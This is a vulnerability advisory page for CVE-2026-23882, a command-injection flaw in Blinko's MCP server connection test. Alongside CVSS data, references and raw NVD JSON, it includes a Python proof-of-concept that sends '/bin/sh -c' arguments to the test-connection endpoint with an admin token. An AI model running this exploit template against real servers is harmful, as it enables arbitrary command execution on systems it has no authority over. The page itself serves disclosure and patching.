CVE-2026-23882

Description

Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, the MCP (Model Context Protocol) server creation function allows specifying arbitrary commands and arguments, which are executed when testing the connection. This issue has been patched in version 1.8.4.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:* - VULNERABLE

Blinko < 1.8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = "http://target-ip/api/mcp/test-connection"

# Malicious command payload (e.g., creating a file)
payload = {
    "serverName": "Exploit",
    "command": "/bin/sh",
    "args": "-c 'touch /tmp/poc_success'"
}

# Headers with Admin token (PR:H required)
headers = {
    "Authorization": "Bearer <ADMIN_TOKEN>",
    "Content-Type": "application/json"
}

# Send request to trigger the vulnerability
response = requests.post(url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] PoC executed successfully. Check /tmp/poc_success")
else:
    print("[-] Failed to execute PoC")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23882
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23882
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23882/
[4] VulDB https://vuldb.com/cve/CVE-2026-23882
[5] https://github.com/blinkospace/blinko/commit/bef6b770743e87c630db2d00d7049dabd96bfe85
[6] https://github.com/blinkospace/blinko/releases/tag/1.8.4
[7] https://github.com/blinkospace/blinko/security/advisories/GHSA-59r2-82p8-c56v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23882", "sourceIdentifier": "[email protected]", "published": "2026-03-23T21:17:05.640", "lastModified": "2026-03-24T18:03:12.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, the MCP (Model Context Protocol) server creation function allows specifying arbitrary commands and arguments, which are executed when testing the connection. This issue has been patched in version 1.8.4."}, {"lang": "es", "value": "Blinko es un proyecto de toma de notas en tarjetas impulsado por IA. Antes de la versión 1.8.4, la función de creación de servidor MCP (Model Context Protocol) permite especificar comandos y argumentos arbitrarios, que se ejecutan al probar la conexión. Este problema ha sido parcheado en la versión 1.8.4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.8.4", "matchCriteriaId": "31941A3D-C688-40DF-AA55-1AF9056275D0"}]}]}], "references": [{"url": "https://github.com/blinkospace/blinko/commit/bef6b770743e87c630db2d00d7049dabd96bfe85", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/blinkospace/blinko/releases/tag/1.8.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/blinkospace/blinko/security/advisories/GHSA-59r2-82p8-c56v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}